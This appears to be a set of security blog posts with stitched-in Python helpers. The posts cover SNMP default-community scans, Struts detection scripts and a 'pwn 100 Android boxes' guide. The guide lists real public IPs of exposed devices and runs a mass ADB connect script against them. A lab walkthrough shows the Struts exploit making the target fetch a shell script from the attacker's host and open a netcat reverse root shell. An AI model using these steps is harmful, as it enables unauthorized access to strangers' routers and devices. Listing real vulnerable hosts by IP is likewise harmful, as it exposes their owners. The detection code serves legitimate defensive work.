Nmap scan report for access-intel-the.realalive.com (202.75.63.190)
Host is up (0.013s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 103.234.100.95
Host is up (0.021s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
Nmap scan report for 118.100.56.74
Host is up (0.019s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 60.48.27.223
Host is up (0.013s latency).
PORT STATE SERVICE
161/udp open|filtered snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 203.106.189.15
Host is up (0.055s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 1.9.76.70
Host is up (0.019s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
<SNIP>
Nmap scan report for 221.133.41.188
Host is up (0.013s latency).
PORT STATE SERVICE
161/udp open|filtered snmp
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
Nmap scan report for 60.53.226.251
Host is up (0.017s latency).
PORT STATE SERVICE
161/udp open|filtered snmp
| snmp-brute:
|_ public - Valid credentials
Nmap done: 100 IP addresses (88 hosts up) scanned in 59.20 seconds
4. Results with valid credentials for private mean anyone can write to the device. Some of these devices belong to small corporations or home users, but if you look carefully, sometimes you can find routers belonging to ISPs. From here, it's pretty much up to the hacker's desire how they wish to exploit it. As usual, I do not condone any illegal activity such as unauthorized intrusion, modification or misuse of computers for which you do not have explicit consent. I have tried on numerous occasions to reach out to warn them about this flaw.
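The "raw" field in each Shodan record from step 1 is the BER-encoded SNMP GetResponse the crawler received, and it already carries the community string the device answered to, so an operator can audit their own address space from a Shodan export without sending a single packet. The Python below is an added example, not part of the original post or of the Shodan CLI: a minimal BER decoder for SNMPv1/v2c messages (handling both short- and long-form lengths, which the records above mix) plus an audit pass that flags default community strings. The two sample records are trimmed copies of the first and fifth results shown in step 1.

```python
"""Decode the raw SNMP GetResponse Shodan stores for each port-161 hit and flag
devices that answered to a default community string (added example)."""
import json

DEFAULT_COMMUNITIES = {"public", "private"}
SNMP_VERSIONS = {0: "v1", 1: "v2c", 3: "v3"}
PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse",
             0xA3: "SetRequest", 0xA4: "Trap"}
SYSDESCR_OID = "1.3.6.1.2.1.1.1.0"


def read_tlv(buf, pos):
    """Read one BER TLV at buf[pos]; return (tag, value, position after it).
    The records above mix short-form (0x59) and long-form (0x81 nn, 0x82 nn nn)
    lengths, so both are handled."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:
        nbytes = length & 0x7F
        if not 1 <= nbytes <= 4:
            raise ValueError("unsupported BER length encoding")
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    end = pos + length
    if end > len(buf):
        raise ValueError("truncated TLV")
    return tag, buf[pos:end], end


def decode_oid(value):
    """Expand base-128 OID arcs; the first byte packs arcs 1 and 2 as 40*x + y."""
    arcs, n = [value[0] // 40, value[0] % 40], 0
    for b in value[1:]:
        n = (n << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(n)
            n = 0
    return ".".join(map(str, arcs))


def decode_value(tag, value):
    """Decode the value types a system-group walk returns; anything else as hex."""
    if tag == 0x02:                       # INTEGER
        return int.from_bytes(value, "big", signed=True)
    if tag in (0x41, 0x42, 0x43):         # Counter32 / Gauge32 / TimeTicks
        return int.from_bytes(value, "big")
    if tag == 0x04:                       # OCTET STRING (sysDescr, sysName, ...)
        return value.decode("utf-8", errors="replace")
    if tag == 0x06:                       # OBJECT IDENTIFIER
        return decode_oid(value)
    return None if tag == 0x05 else value.hex()   # NULL, else raw bytes


def parse_snmp(raw_hex):
    """Message ::= SEQUENCE { version INTEGER, community OCTET STRING, PDU }."""
    buf = bytes.fromhex(raw_hex)
    tag, msg, _ = read_tlv(buf, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, ver, pos = read_tlv(msg, 0)
    _, community, pos = read_tlv(msg, pos)
    pdu_tag, pdu, _ = read_tlv(msg, pos)
    _, req_id, pos = read_tlv(pdu, 0)           # request-id
    _, err_status, pos = read_tlv(pdu, pos)     # error-status
    _, _err_index, pos = read_tlv(pdu, pos)     # error-index
    _, vbl, _ = read_tlv(pdu, pos)              # VarBindList
    varbinds, pos = [], 0
    while pos < len(vbl):
        _, vb, pos = read_tlv(vbl, pos)
        _, oid, after_oid = read_tlv(vb, 0)
        vtag, val, _ = read_tlv(vb, after_oid)
        varbinds.append((decode_oid(oid), decode_value(vtag, val)))
    return {
        "version": SNMP_VERSIONS.get(int.from_bytes(ver, "big"), "unknown"),
        "community": community.decode("latin-1"),
        "pdu_type": PDU_NAMES.get(pdu_tag, hex(pdu_tag)),
        "request_id": int.from_bytes(req_id, "big", signed=True),
        "error_status": int.from_bytes(err_status, "big"),
        "varbinds": varbinds,
    }


def audit_records(json_lines):
    """One finding per record: who answered, to which community, and whether it
    is a default one (on v1/v2c the community is the only 'credential')."""
    findings = []
    for line in json_lines:
        rec = json.loads(line)
        msg = parse_snmp(rec["opts"]["raw"])
        sysdescr = next((v for oid, v in msg["varbinds"] if oid == SYSDESCR_OID), None)
        findings.append({"ip": rec["ip_str"], "version": msg["version"],
                         "community": msg["community"],
                         "default_community": msg["community"] in DEFAULT_COMMUNITIES,
                         "sysdescr": sysdescr})
    return findings


# Raw responses copied from the first and fifth Shodan results in step 1, wrapped
# in trimmed records of the same shape (only the fields audited here are kept).
RAW_BIPAC = "30818202010004067075626c6963a275020466b16a5e0201000201003067306506082b06010201010100045942495041432d383530302e20482f573a20534844534c20284f72696f6e292076312e3030202f2048653130302f327878204353502076322e3320462f573a20352e35326831202831312053657074656d626572203230303729"
RAW_INNACOMM = "3082004302010004067075626c6963a2820034020466b16a5e020100020100308200243082002006082b060102010101000414573334303056362d342e30364c2e30326a2d544d"
SAMPLE_RECORDS = [
    '{"ip_str": "219.93.96.161", "org": "TM Net", "opts": {"raw": "%s"}}' % RAW_BIPAC,
    '{"ip_str": "60.51.37.217", "org": "TM Net", "opts": {"raw": "%s"}}' % RAW_INNACOMM,
]
```

Run `audit_records` over a full `zcat shodan-api-snmp.txt.json.gz` export and every record with `default_community` true is a device that step 3's snmp-brute would also report, without any traffic to the device. Note that the fifth record uses 0x82 two-byte lengths for structures that fit in a single byte; a decoder that only understands short-form lengths would reject it.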
Summary
This flaw might sound trivial to some, but for someone seeking malice, it could easily be turned into a weapon. The fault is a lack of awareness of simple cyber security hygiene. Often, simple mistakes make for easy pickings for hackers. It is only human to look for quick and easy ways into an adversary's network. While corporations spend millions procuring the greatest security to protect their crown assets, the simplest solutions are often forgotten. I will be presenting my findings at Rawsec meetup #3, 2019. My slides will be up shortly.
Monday, March 4, 2019
Detecting Apache Struts2 Namespace Redirect OGNL Injection Vulnerability
LUA C0ding
Here is another Nmap NSE script I wrote to detect this vulnerability. The script is very simple: I send a simple arithmetic expression, ${1+1}, in a vulnerable URL, e.g. http://victim.com/${1+1}/help.action, and if the host replies with the header "Location: /2/help.action", the host evaluated the OGNL expression and is vulnerable. In this script I generate two random numbers and sum them; if the Location header of the resulting 302 redirect contains the matching sum, then it's a vulnerable host. There are a few exploits in the wild for this vulnerability but none written for Nmap NSE enumeration. I'm pretty sure this sort of code will be useful for other pen-testers out there. I have submitted it to GitHub via a pull request; let's see if my code makes it to the master branch soon. The output of a positive detection is as follows:
$ sudo nmap --script ./http-vuln-cve2018-11776 127.0.0.1 -p 8080 -n --script-args url=/
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-07 00:37 +08
Nmap scan report for 127.0.0.1
Host is up (0.000090s latency).
PORT STATE SERVICE
8080/tcp open http-proxy
| http-vuln-cve2018-11776:
| VULNERABLE:
| Apache Struts 2 Namespace Redirect OGNL Injection
| State: VULNERABLE
| IDs: CVE:CVE-2018-11776
| Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true
| (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard
| namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no
| or wildcard namespace.
|
| Disclosure date: 2018-08-22
| References:
| https://github.com/hook-s3c/CVE-2018-11776-Python-PoC
| https://lgtm.com/blog/apache_struts_CVE-2018-11776
| https://cwiki.apache.org/confluence/display/WW/S2-057
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
Reverse Engineering
$ sudo docker container run -it --rm -p 8080:8080 struts2
$ sudo docker container ls
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
3ff6c242970b struts2 "catalina.sh run" 9 seconds ago Up 8 seconds 0.0.0.0:8080->8080/tcp nifty_varahamihira
Then I ran a couple of exploits and detection scripts to reverse engineer the code, using Wireshark to analyse the HTTP traffic.
$ ./exploitS2-057-test.py http://127.0.0.1:8080/showcase.action
testing the url for exploit; http://127.0.0.1:8080/${16074+35045}/help.action
URL http://127.0.0.1:8080/showcase.action s2-057 CVE-2018-11776 is vulnerable!
Putting It Together
Once I had an understanding of how the exploits work, it was just a matter of porting it to the Lua scripting language, which I knew jack shit about! So it took me a few hours of hacking to get some dirty code up and running.
Tuesday, February 5, 2019
Detecting Apache Struts S2-052
Introduction
Here's an Nmap NSE script I wrote to detect the 2nd variant of the Apache Struts REST Plugin XStream Remote Code Execution vulnerability, CVE-2017-9805. The script is downloadable here. This was one of the infamous vulnerabilities that hit Equifax in 2017; the one that hit them was the 1st variant, CVE-2017-5638. Since there wasn't an NSE script to detect the 2nd variant, I decided to write my own.
Sample output:
$ sudo nmap -n --script ./http-vuln-cve2017-9805 -p 80 ptl-41af4f81-e25cbf8e.libcurl.so --script-args=/ -sSV
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-05 17:22 +08
Nmap scan report for ptl-41af4f81-e25cbf8e.libcurl.so (104.131.54.221)
Host is up (0.29s latency).
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.6.2
|_http-server-header: nginx/1.6.2
| http-vuln-cve2017-9805:
| VULNERABLE:
| Apache Struts REST Plugin XStream RCE
| State: VULNERABLE
| IDs: CVE:CVE-2017-9805
| The REST Plugin in Apache Struts 2.1.2 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for
| deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads
|
| Disclosure date: 2017-09-15
| References:
| https://www.r00tpgp.com/2019/02/detecting-apache-struts-s2-052.html
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805
| https://cwiki.apache.org/confluence/display/WW/S2-052
|_ https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.38 seconds
Line 67 contains the payload; an exploit would usually have the evil command inserted here, but since this is just a detection script there is no need for it. If vulnerable, the server will respond with an HTTP 200 stack trace dump containing keywords such as "org.apache.struts2.rest.handler.XStreamHandler.toObject". Line 80 compares the HTTP response against that string. This is the indicator that the host is running the Apache Struts2 XStreamHandler object and is very likely vulnerable to RCE.
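As an added example (not the author's NSE scripts and not code from the Nmap project), here are the two detection checks described in this post and in the S2-057 post above, written in Python against the standard library. The S2-057 check mirrors the random-sum redirect test: it requests /${a+b}/help.action with fresh random operands and only reports a hit when the 3xx Location header carries the evaluated sum. The S2-052 check mirrors the comparison on line 80: it looks for the XStreamHandler.toObject string in the response. The base paths, the port numbers and the S2-052 probe body (an XML element naming a type XStream cannot resolve, which I assume is enough to surface the handler in a stack trace) are my assumptions. Both probes only detect; neither executes anything on the target, and the decision logic is kept separate from the HTTP calls so it can be tested against captured responses.

```python
"""Struts detection checks for S2-057 (CVE-2018-11776) and S2-052 (CVE-2017-9805).

Added illustration, not the author's NSE scripts. Standard library only.
"""
import random
import re
import urllib.error
import urllib.request
from typing import Optional, Tuple

# The indicator the S2-052 write-up looks for: the REST plugin's XStream
# handler appearing in a stack trace in the response body.
XSTREAM_MARKER = "org.apache.struts2.rest.handler.XStreamHandler.toObject"


def build_s2_057_probe(a: Optional[int] = None, b: Optional[int] = None) -> Tuple[str, int]:
    """Build '/${a+b}/help.action' plus the sum a vulnerable host redirects to.

    Fresh random operands per probe mean a cached or coincidental redirect
    cannot produce the expected value."""
    if a is None:
        a = random.randint(10000, 99999)
    if b is None:
        b = random.randint(10000, 99999)
    return f"/${{{a}+{b}}}/help.action", a + b


def s2_057_vulnerable(status: int, location: Optional[str], expected_sum: int) -> bool:
    """True only if the host redirected and the Location namespace equals the
    evaluated sum, i.e. the OGNL expression was executed server side."""
    if not (300 <= status < 400) or not location:
        return False
    m = re.search(r"/(\d+)/help\.action", location)
    return m is not None and int(m.group(1)) == expected_sum


def s2_052_vulnerable(body: str) -> bool:
    """The post's indicator: the XStream handler surfaces in a stack trace.
    It proves the REST plugin is present, not that the type whitelist of a
    patched build is absent, so confirm the version range before calling it
    exploitable."""
    return XSTREAM_MARKER in body


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Hand the 3xx back to the caller instead of following it."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def probe_s2_057(base_url: str, timeout: float = 5.0) -> bool:
    """GET base_url/${a+b}/help.action and inspect the redirect (nothing is executed)."""
    path, expected = build_s2_057_probe()
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(base_url.rstrip("/") + path, timeout=timeout) as resp:
            status, location = resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:
        status, location = err.code, err.headers.get("Location")
    return s2_057_vulnerable(status, location, expected)


def probe_s2_052(endpoint_url: str, timeout: float = 5.0) -> bool:
    """POST an XML document naming a type XStream cannot resolve (assumption:
    that is enough to surface the handler in the trace; it runs nothing)."""
    req = urllib.request.Request(
        endpoint_url, data=b"<nonexistent-type-for-detection/>", method="POST",
        headers={"Content-Type": "application/xml"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            text = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        text = err.read().decode("utf-8", "replace")
    return s2_052_vulnerable(text)


if __name__ == "__main__":
    # Lab targets from the posts: Struts showcase on 8080, REST plugin app on 80.
    print("S2-057:", probe_s2_057("http://127.0.0.1:8080"))
    print("S2-052:", probe_s2_052("http://127.0.0.1/orders"))
```

Treat an S2-052 hit as "REST plugin with XStreamHandler present" and confirm it against the affected version range printed by the NSE script before reporting it as exploitable; a patched build can still show the handler in a trace. Run the module directly against the two lab containers from these posts to see both checks fire.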
Exploitation
For testing purposes, you can download a vulnerable docker here.
$ sudo docker pull medicean/vulapps:s_struts2_s2-052
s_struts2_s2-052: Pulling from medicean/vulapps
8ad8b3f87b37: Pull complete
751fe39c4d34: Pull complete
b165e84cccc1: Pull complete
acfcc7cbc59b: Pull complete
04b7a9efc4af: Pull complete
b16e55fe5285: Pull complete
8c5cbb866b55: Pull complete
96290882cd1b: Pull complete
85852deeb719: Pull complete
ff68ba87c7a1: Pull complete
584acdc953da: Pull complete
dd3a387a5bb7: Pull complete
d7cf4f910c29: Pull complete
c181fe02fed0: Pull complete
d2d0ca101682: Pull complete
Digest: sha256:fda2fe3b6df63b95d0e258d0f2822282fb627df7bf86e09c31a76b1a56403130
Status: Downloaded newer image for medicean/vulapps:s_struts2_s2-052
$ sudo docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-052
ebcfc7292899201c56dee30f8bec934d271a7c93e504cc33d7f451642aae0616
Check if it's up:
$ sudo docker container ls
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
ebcfc7292899 medicean/vulapps:s_struts2_s2-052 "/usr/local/tomcat/b…" 12 seconds ago Up 9 seconds 0.0.0.0:80->8080/tcp upbeat_visvesvaraya
Great! Now let's see if my NSE script works:
$ sudo nmap --script http-vuln-cve2017-9805.nse localhost --script-args path=/orders -p 80
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-09 16:18 +08
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00010s latency).
Other addresses for localhost (not scanned): ::1
PORT STATE SERVICE
80/tcp open http
| http-vuln-cve2017-9805:
| VULNERABLE:
| Apache Struts REST Plugin XStream RCE
| State: VULNERABLE
| IDs: CVE:CVE-2017-9805
| The REST Plugin in Apache Struts 2.1.2 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for
| deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads
|
| Disclosure date: 2017-09-15
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805
| https://www.r00tpgp.com/2019/02/detecting-apache-struts-s2-052.html
| https://cwiki.apache.org/confluence/display/WW/S2-052
|_ https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement
Nmap done: 1 IP address (1 host up) scanned in 0.59 seconds
Bang! The vulnerability was detected, now let's download the exploit for cve-2017-9805 and pwn this box:
$ wget https://raw.githubusercontent.com/mazen160/struts-pwn_CVE-2017-9805/master/struts-pwn.py
--2019-02-09 16:21:39-- https://raw.githubusercontent.com/mazen160/struts-pwn_CVE-2017-9805/master/struts-pwn.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.76.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.76.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13843 (14K) [text/plain]
Saving to: ‘struts-pwn.py’
struts-pwn.py 100%[===========================================================================================>] 13.52K --.-KB/s in 0.09s
2019-02-09 16:21:40 (144 KB/s) - ‘struts-pwn.py’ saved [13843/13843]
This exploit is a bit weird: I can't chain it in a one-liner, so I had to do it step by step. First, the target downloads the bash reverse shell script from my host:
$ ./struts-pwn.py -u http://localhost/orders -c "wget http://192.168.43.216:81/shell.sh -O /tmp/shell.sh" --exploit
[*] URL: http://localhost/orders
[*] CMD: wget http://192.168.43.216:81/shell.sh -O /tmp/shell.sh
[$] Request sent.
[.] If the host is vulnerable, the command will be executed in the background.
[%] Done.
On my machine, I run a simple HTTP server using Python. I know I got RCE since the victim connected to download the shell:
$ sudo python -m SimpleHTTPServer 81
Serving HTTP on 0.0.0.0 port 81 ...
172.17.0.2 - - [09/Feb/2019 17:00:19] "GET /shell.sh HTTP/1.1" 200 -
It's time to execute the exploit on the target:
$ ./struts-pwn.py -u http://localhost/orders -c "bash /tmp/shell.sh" --exploit
[*] URL: http://localhost/orders
[*] CMD: bash /tmp/shell.sh
[$] Request sent.
[.] If the host is vulnerable, the command will be executed in the background.
[%] Done.
Finally, my netcat listener should pick it up; always remember to start this before you execute the exploit:
$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.43.216] from (UNKNOWN) [172.17.0.2] 40786
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@ebcfc7292899:/tmp# uname -a
uname -a
Linux ebcfc7292899 4.18.0-kali3-amd64 #1 SMP Debian 4.18.20-2kali2 (2018-11-30) x86_64 GNU/Linux
root@ebcfc7292899:/tmp#
Summary
There you go folks, I just showed you how I wrote an Nmap NSE script to detect this vulnerability, set up a vulnerable docker image and exploited the vulnerability step by step. There are easier ways, I am sure: just use Burp Suite to POST the vulnerable payload to the target instead of blindly executing the exploit script multiple times. Always understand how the exploit works and what you are doing; break the process down into smaller steps until you get the desired result.
Saturday, February 2, 2019
How To Pwn 100 Android Boxes
Background
Back in 2018, there were reports that many Android IoT manufacturers were shipping Android TV boxes with the Android Debug Bridge (ADB) enabled by default. When such a device is connected to the Internet, the ADB daemon listens on port 5555/tcp. This is a manufacturer misconfiguration: the feature is only meant for developers to remotely debug Android apps, and there is no reason why it should be turned ON in a shipped device. In the wrong hands, a hacker can remotely install apps, take screenshots, turn on webcams, and download and upload apps on vulnerable devices. Furthermore, some devices were pre-rooted, so a hacker can escalate to root using "su -" without a password. It is so easy to exploit that there are several Monero mining bots exploiting this misconfiguration in the wild.
Purpose
What I am about to show you is how to pwn 100 of these devices in under 10mins. This is merely for demo purposes and I will not be held responsible for any misuse or unlawful activities. I do not condone any activities that are against the Law. Do note that I did not run anything malicious on the vulnerable targets, I will leave the evil bits for your moral judgment to decide upon. So please be reminded this is purely for EDUCATIONAL PURPOSES ONLY.
Target Recon With Shodan.io
1. Using the Shodan API, you can download a list of vulnerable targets. Here I am using the shodan CLI from the Shodan Python library to query for 100 vulnerable Android devices:
$ shodan download --limit 100 shodan-adb.txt Android Debug Bridge
Search query: Android Debug Bridge
Total number of results: 21134
Query credits left: 100
Output file: shodan-adb.txt.json.gz
[###################################-] 99% 00:00:02
Saved 100 results into file shodan-adb.txt.json.gz
1a. The output is by default in json format:
$ zcat shodan-adb.txt.json.gz
{"_shodan": {"id": "19e30085-0185-4a04-a3e1-bc360e51a992", "options": {}, "ptr": true, "module": "http-simple-new", "crawler": "d264629436af1b777b3b513ca6ed1404d7395d80"}, "product": "Android Debug Bridge", "hash": -527783761, "os": null, "opts": {"raw": "434e584e000000010010000069000000d7260000bcb1a7b16465766963653a3a726f2e70726f647563742e6e616d653d7461696d656e3b726f2e70726f647563742e6d6f64656c3d504958454c203220584c3b726f2e70726f647563742e6465766963653d7461696d656e3b66656174757265733d636d642c7368656c6c5f7632"}, "ip": 3552705273, "isp": "Korea Telecom", "http": {"robots_hash": null, "redirects": [], "securitytxt": null, "title": null, "sitemap_hash": null, "robots": null, "server": null, "host": "211.193.250.249", "html": null, "location": "/", "html_hash": null, "sitemap": null, "securitytxt_hash": null}, "port": 5555, "hostnames": [], "location": {"city": "Jeju", "region_code": "01", "area_code": null, "longitude": 126.53930000000003, "country_code3": "KOR", "country_name": "Korea, Republic of", "postal_code": null, "dma_code": null, "country_code": "KR", "latitude": 33.45580000000001}, "timestamp": "2019-02-01T15:16:24.994715", "domains": [], "org": "Korea Telecom", "data": "Android Debug Bridge\nName: taimen\nModel: PIXEL 2 XL\nDevice: taimen\n", "asn": "AS4766", "transport": "tcp", "ip_str": "211.193.250.249"}
{"_shodan": {"id": "22de199d-d671-451b-8880-96c8fe411e4f", "options": {}, "ptr": true, "module": "http-simple-new", "crawler": "5faf2928ceb560cb4276cc1b4660b2d763cc6397"}, "product": "Android Debug Bridge", "hash": -748033244, "os": null, "opts": {"raw": "434e584e000000010010000059000000001f0000bcb1a7b16465766963653a3a726f2e70726f647563742e6e616d653d6d3230315f3531326d3b726f2e70726f647563742e6d6f64656c3d536d6172745f54563b726f2e70726f647563742e6465766963653d6d3230315f3531326d3b00"}, "ip": 3201925557, "isp": "Telefonica del Sur S.A.", "http": {"robots_hash": null, "redirects": [], "securitytxt": null, "title": null, "sitemap_hash": null, "robots": null, "server": null, "host": "190.217.129.181", "html": null, "location": "/", "html_hash": null, "sitemap": null, "securitytxt_hash": null}, "port": 5555, "hostnames": [], "location": {"city": "Villarrica", "region_code": "04", "area_code": null, "longitude": -72.2167, "country_code3": "CHL", "country_name": "Chile", "postal_code": null, "dma_code": null, "country_code": "CL", "latitude": -39.266699999999986}, "timestamp": "2019-02-01T15:15:08.823312", "domains": [], "org": "Telefonica del Sur S.A.", "data": "Android Debug Bridge\nName: m201_512m\nModel: Smart_TV\nDevice: m201_512m\n", "asn": "AS14117", "transport": "tcp", "ip_str": "190.217.129.181"}
....
..
blah
blah
2. Let's parse them into a readable format, keeping only the IP address:
$ shodan parse --fields ip_str shodan-adb.txt.json.gz > shodan-adb.txt
$ cat shodan-adb.txt
211.193.250.249
190.217.129.181
211.104.178.191
118.161.216.47
24.222.139.184
183.151.182.140
175.125.24.143
114.37.207.133
218.191.106.190
220.118.42.222
113.254.141.47
1.163.112.179
91.247.107.164
...
...
blah
blah
3. The targets are probably home devices and therefore very likely to be on dynamic IP addresses. To ensure that these targets are still alive and listening on port 5555, I like to Nmap them one more time:
$ nmap -iL shodan-adb.txt -p 5555 -n -oG adb-alive
$ cat adb-alive
# Nmap 7.70 scan initiated Fri Feb 1 23:25:02 2019 as: nmap -iL shodan-adb.csv -p 5555 -n -oG adb-alive
Host: 190.217.129.181 () Status: Up
Host: 190.217.129.181 () Ports: 5555/open/tcp//freeciv///
Host: 118.161.216.47 () Status: Up
Host: 118.161.216.47 () Ports: 5555/open/tcp//freeciv///
Host: 24.222.139.184 () Status: Up
Host: 24.222.139.184 () Ports: 5555/open/tcp//freeciv///
Host: 175.125.24.143 () Status: Up
Host: 175.125.24.143 () Ports: 5555/open/tcp//freeciv///
Host: 218.191.106.190 () Status: Up
Host: 218.191.106.190 () Ports: 5555/open/tcp//freeciv///
Host: 113.254.141.47 () Status: Up
Host: 113.254.141.47 () Ports: 5555/open/tcp//freeciv///
Host: 91.247.107.164 () Status: Up
Host: 91.247.107.164 () Ports: 5555/open/tcp//freeciv///
Host: 49.72.210.171 () Status: Up
Host: 49.72.210.171 () Ports: 5555/open/tcp//freeciv///
Host: 114.39.245.43 () Status: Up
...
....
...
blah
blah..
Connecting via ADB to port 5555
1. Before I connect to the targets, I need to format the output a bit, so some awk magic should do the trick ;-)
$ cat adb-alive | grep "5555/open" | awk '{print "adb connect " $2":5555"}' > run-adb-connect.sh
$ cat run-adb-connect.sh
adb connect 190.217.129.181:5555
adb connect 118.161.216.47:5555
adb connect 24.222.139.184:5555
adb connect 175.125.24.143:5555
adb connect 218.191.106.190:5555
adb connect 113.254.141.47:5555
adb connect 91.247.107.164:5555
adb connect 49.72.210.171:5555
adb connect 114.39.245.43:5555
adb connect 178.163.11.211:5555
adb connect 203.115.98.94:5555
adb connect 14.136.53.43:5555
adb connect 190.95.46.226:5555
adb connect 212.75.143.220:5555
adb connect 83.209.25.67:5555
adb connect 211.215.164.133:5555
adb connect 213.113.235.218:5555
adb connect 121.34.28.60:5555
adb connect 117.215.191.170:5555
adb connect 121.202.94.21:5555
adb connect 186.95.32.108:5555
adb connect 222.117.48.55:5555
adb connect 61.74.128.26:5555
.....
..
blah
blah.
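As an added example, not the post's own tooling, here is the grep/awk step above redone as a small Python parser, with constructed sample input using RFC 5737 documentation addresses instead of real hosts. It reads the Shodan JSON records (only the port, ip_str and data fields shown above are assumed), extracts Name/Model/Device from the ADB banner, reads the nmap -oG file, keeps only hosts whose Ports field says 5555/open, and joins the two into an inventory. A defender hunting these on their own ranges, or an ISP CERT sending notifications, wants exactly this list: which hosts are exposed right now and what they are.

```python
"""Inventory of Internet-exposed ADB (5555/tcp) hosts from a Shodan export plus a
fresh Nmap grepable scan. Added illustration, not the author's tooling."""
import json
from typing import Dict, List

# Constructed sample input (RFC 5737 documentation addresses), shaped like the
# `zcat shodan-adb.txt.json.gz` records above but trimmed to the fields used.
SHODAN_JSONL = r"""
{"port": 5555, "ip_str": "192.0.2.10", "transport": "tcp", "data": "Android Debug Bridge\nName: m201_512m\nModel: Smart_TV\nDevice: m201_512m\n"}
{"port": 5555, "ip_str": "198.51.100.7", "transport": "tcp", "data": "Android Debug Bridge\nName: taimen\nModel: PIXEL 2 XL\nDevice: taimen\n"}
{"port": 80, "ip_str": "203.0.113.5", "transport": "tcp", "data": "HTTP/1.1 200 OK\n"}
"""

# Constructed `nmap -oG` output: the first host is still open, the second has
# moved on (dynamic IP) and the third never was an ADB hit.
NMAP_GREPABLE = """# Nmap 7.70 scan initiated (constructed sample)
Host: 192.0.2.10 () Status: Up
Host: 192.0.2.10 () Ports: 5555/open/tcp//freeciv///
Host: 198.51.100.7 () Status: Up
Host: 198.51.100.7 () Ports: 5555/closed/tcp//freeciv///
Host: 203.0.113.5 () Ports: 5555/filtered/tcp//freeciv///
# Nmap done
"""


def parse_adb_banner(data: str) -> Dict[str, str]:
    """Turn Shodan's 'Android Debug Bridge\\nName: x\\nModel: y\\n' banner into a dict."""
    fields: Dict[str, str] = {}
    for line in data.splitlines():
        if ": " in line:
            key, value = line.split(": ", 1)
            fields[key.strip()] = value.strip()
    return fields


def parse_shodan_records(jsonl: str, port: int = 5555) -> Dict[str, Dict[str, str]]:
    """ip_str -> parsed banner for every record on the ADB port."""
    banners: Dict[str, Dict[str, str]] = {}
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        if rec.get("port") != port:
            continue
        banners[rec["ip_str"]] = parse_adb_banner(rec.get("data", ""))
    return banners


def parse_nmap_grepable(text: str, port: int = 5555) -> List[str]:
    """IPs whose grepable 'Ports:' field lists <port>/open (the grep "5555/open" step)."""
    open_hosts: List[str] = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        ip = line.split()[1]
        for entry in line.split("Ports:", 1)[1].split(","):
            parts = entry.strip().split("/")
            if len(parts) >= 2 and parts[0] == str(port) and parts[1] == "open":
                open_hosts.append(ip)
    return open_hosts


def exposed_adb_inventory(jsonl: str, grepable: str) -> List[Dict[str, str]]:
    """Join the Shodan banner with the live scan: only hosts open right now,
    each tagged with model/device so an owner or ISP can be told what to fix."""
    banners = parse_shodan_records(jsonl)
    rows = []
    for ip in parse_nmap_grepable(grepable):
        banner = banners.get(ip, {})
        rows.append({"ip": ip,
                     "model": banner.get("Model", "unknown"),
                     "device": banner.get("Device", "unknown")})
    return rows


if __name__ == "__main__":
    for row in exposed_adb_inventory(SHODAN_JSONL, NMAP_GREPABLE):
        print(f"{row['ip']:16} model={row['model']} device={row['device']}")
```

Only the host that is open at scan time survives the join, which is the point of re-scanning a Shodan export of dynamically addressed home devices: the inventory reflects what is exposed now, not what was indexed days ago.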
2. OK, now that everything is ready, it is time to execute my script to connect to the targets:
$ bash ./run-adb-connect.sh
already connected to 190.217.129.181:5555
